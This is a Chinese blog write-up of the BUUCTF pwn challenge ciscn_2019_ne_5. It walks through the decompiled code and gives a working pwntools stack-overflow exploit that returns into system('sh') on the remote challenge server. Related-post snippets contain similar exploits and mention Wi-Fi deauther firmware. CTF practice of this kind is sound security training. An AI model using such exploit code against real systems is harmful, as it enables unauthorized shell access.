[BUUCTF-pwn]——ciscn_2019_ne_5

最新推荐文章于 2023-04-09 16:35:13 发布
最新推荐文章于 2023-04-09 16:35:13 发布
阅读量370 收藏 1
点赞数
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113791933
版权

[BUUCTF-pwn]——ciscn_2019_ne_5

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // [esp+0h] [ebp-100h]
  char src[4]; // [esp+4h] [ebp-FCh]
  char v5; // [esp+8h] [ebp-F8h]
  char s1[4]; // [esp+84h] [ebp-7Ch]
  char v7; // [esp+88h] [ebp-78h]
  char *v8; // [esp+E8h] [ebp-18h]
  int *v9; // [esp+ECh] [ebp-14h]
  int *v10; // [esp+F4h] [ebp-Ch]

  v10 = &argc;
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  fflush(stdout);
  *(_DWORD *)s1 = 48;
  memset(&v7, 0, 0x60u);
  *(_DWORD *)src = 48;
  memset(&v5, 0, 0x7Cu);
  puts("Welcome to use LFS.");
  printf("Please input admin password:");
  __isoc99_scanf();
  if ( strcmp(s1, "administrator") )
  {
    puts("Password Error!");
    exit(0);
  }
  puts("Welcome!");
  while ( 1 )
  {
    puts("Input your operation:");
    puts("1.Add a log.");
    puts("2.Display all logs.");
    puts("3.Print all logs.");
    printf("0.Exit\n:");
    v9 = &v3;
    v8 = "%d";
    __isoc99_scanf();
    switch ( v3 )
    {
      case 0:
        exit(0);
        return;
      case 1:
        v8 = src;
        AddLog();
        break;
      case 2:
        Display(src);
        break;
      case 3:
        Print();
        break;
      case 4:
        GetFlag(src);
        break;
      default:
        continue;
    }
  }
}

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
由于最开始的反汇编失败,反汇编的代码可能与实际有些许出入,应该就是反汇编失败的地方,__isoc99_scanf() 函数. 通过验证得到第一个是给s1赋值,第二个是给v3赋值;AddLog()函数里面的应该是给src赋值

思路也就出来了: 在1选项中AddLog()给src赋值, 然后,在4选项,通过strcpy给dest赋值,进行栈溢出的利用.
查看一下,有没有可以利用的字符串,毕竟已经找到了system函数
在这里插入图片描述
发现了 ‘sh’ 字符

exploit

from pwn import *
context.os='linux'
context.arch='i386'
context.log_level='debug'
p = remote("node3.buuoj.cn",25035)
sh_addr = 0x080482ea
system_addr = 0x080486B9
p.sendlineafter("Please input admin password:",'administrator')
p.sendlineafter("0.Exit\n:",'1')
payload = 'a'*(0x48+0x4)+p32(system_addr)+p32(sh_addr)

p.sendlineafter("Please input new log info:",payload)
p.sendlineafter("0.Exit\n:",'4')

p.interactive()
Y-peak
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf|pwn-ciscn_2019_ne_5-wp
l2645470582_的博客
11-09 192
1.例行检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串 我们看到flag就是我们输入的log 3.我们看看main函数里面有什么 我们看到第一个条件s1 == 'administrator' 进入过后,v3是你想要选择执行的内容 ADDLog():我们看到这里是输入log,跟我们的flag有关系 a1是我们外面传进来的src = 48,读取128个就造成了溢出 ...
ciscn_2019_ne_5【BUUCTF】
qq_41696518的博客
08-31 519
ciscn_2019_ne_5 BUUCTF
BUUCTF pwn——ciscn_2019_ne_5
CNS-Enterprise BCC-1701-J
04-09 130
BUUCTF 做题练习
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1605
buuctf ciscn_2019_ne_5题目分析
BUUCTF ciscn_2019_ne_5 & jarvisoj_fm
红叶的博客
11-01 683
只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
BUUCTF(pwn)ciscn_2019_ne_5
半岛铁盒的博客
03-30 197
先点进去 cat flag 说了 在 1 log中 from pwn import* r=remote('node3.buuoj.cn',26204) sys=0x80486b9 sh=0x080482ea r.sendlineafter("Please input admin password:",administrator) r.sendlineafter("0.Exit\n:",1) payload='a'*(0x48+4)+p32(sys)+p32(sh) r.sendlineaf...
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 1937
ciscn_2019_ne_5 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
【BUUCTF】ciscn_2019_ne_5 Write Up
古月浪子的博客
08-06 839
题目是一道32位程序,依旧是rop 仔细观察可以发现漏洞出在GetFlag函数的strcpy上,我们可以输入的字符有128个,而复制字符串的栈空间只有0x48字节 程序本身存在fflush函数,我们可以直接用它的sh来当作system的参数 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='i386' context.log_level='deb...
buuctf ciscn_2019_ne_5
carol2358的博客
04-21 1085
ret2text 覆盖dest需要0x48+0x4,sh可以用gdb的find找到,别忘了写4个字符的返回地址 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_ne_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' ...
BUUCTF-Pwn-ciscn_2019_ne_5
餐桌上的猫
03-25 124
exp from pwn import* elf=ELF('/home/lhb/桌面/ciscn_2019_ne_5') p=remote('node4.buuoj.cn',28555) str_sh=0x80482EA system_plt=elf.plt['system'] p.sendline(b'administrator') p.sendline(b'1') payload=b'a'*(0x48+4)+p32(system_plt)+b'a'*4+p32(str_sh) p.sendline(
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1777
这里写自定义目录标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
今天你pwn了吗(中)
蚁景网安学院
05-15 751
Y今天你pwn了吗前言:"二进制太难了", 一起到 buu 开始 刷题吧。这里 仅记录下非高分题目的解题思路和知识讲解。特别是文章里的函数,我特意整理了下,希望我能在二进...
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2583
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
Buuctf(pwn) ciscn_2019_n_5
半岛铁盒的博客
03-30 310
发现name在全局变量bss段上 可以利用 gets() 进行溢出 from pwn import* r=remote('node3.buuoj.cn',27785) context(arch='amd64',os='linux') 说明版本架构 shellcode=asm(shellcraft.sh()) 获取生成调用 bin/sh的 shellcode r.sendlineafter('tell me your name',shellcode) 往name里面写入shellcod...
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值